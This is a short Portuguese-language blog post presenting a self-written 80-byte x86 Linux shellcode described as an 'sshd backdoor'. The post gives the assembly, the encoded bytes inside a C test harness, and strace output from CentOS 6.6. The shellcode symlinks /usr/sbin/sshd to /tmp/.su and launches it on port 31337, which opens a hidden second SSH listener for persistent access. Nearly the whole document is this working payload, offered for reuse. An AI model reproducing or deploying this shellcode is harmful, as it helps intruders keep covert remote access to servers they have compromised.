segunda-feira, 6 de abril de 2015

Simple sshd backdoor shellcode (Linux - X86)

Mais um shellcode, level noob, que eu fiz, codigo asm:
section .text
 global _start:

_start:
	; by mmxm (@hc0d3r)
	; symlink("/usr/sbin/sshd", "/tmp/.su")

	xor eax, eax
	xor ebx, ebx
	xor ecx, ecx

	mov bx, 0x6468

	push ebx
	push 0x73732f6e
	push 0x6962732f
	push 0x7273752f

	mov ebx, esp

	mov al, 83

	push ecx
	push 0x75732e2f
	push 0x706d742f

	mov ecx, esp

	int 0x80

	; execve("/tmp/.su", ["/tmp/.su","-oPort=31337"], [ NULL ])

	xor eax, eax
	xor ebx, ebx
	xor edx, edx

	mov ebx, ecx

	push eax
	push 0x37333331
	push 0x333d7472
	push 0x6f506f2d

	mov ecx, esp

	push eax
	push ecx
	push ebx

	mov ecx, esp

	mov al, 11

	int 0x80


Shellcode:
#include <stdio.h>
#include <string.h>

// shellcode by mmxm (@hc0d3r)

unsigned const char shellcode[]=
	"\x31\xc0\x31\xdb\x31\xc9\x66\xbb\x68\x64"
	"\x53\x68\x6e\x2f\x73\x73\x68\x2f\x73\x62"
	"\x69\x68\x2f\x75\x73\x72\x89\xe3\xb0\x53"
	"\x51\x68\x2f\x2e\x73\x75\x68\x2f\x74\x6d"
	"\x70\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x31"
	"\xd2\x89\xcb\x50\x68\x31\x33\x33\x37\x68"
	"\x72\x74\x3d\x33\x68\x2d\x6f\x50\x6f\x89"
	"\xe1\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void){
	printf("Shellcode size: %d bytes\n", sizeof(shellcode)-1);
	asm("jmp shellcode");
	return 0;
}

Testado em CentOS 6.6
[mmxm@hc0d3r ASM]$ strace -e execve,symlink ./a.out
execve("./a.out", ["./a.out"], [/* 42 vars */]) = 0
Shellcode size: 80 bytes
symlink("/usr/sbin/sshd", "/tmp/.su")   = 0
execve("/tmp/.su", ["/tmp/.su", "-oPort=31337"], [/* 0 vars */]) = 0

Referencia: http://pastebin.com/LnSRJed1

Nenhum comentário:

Postar um comentário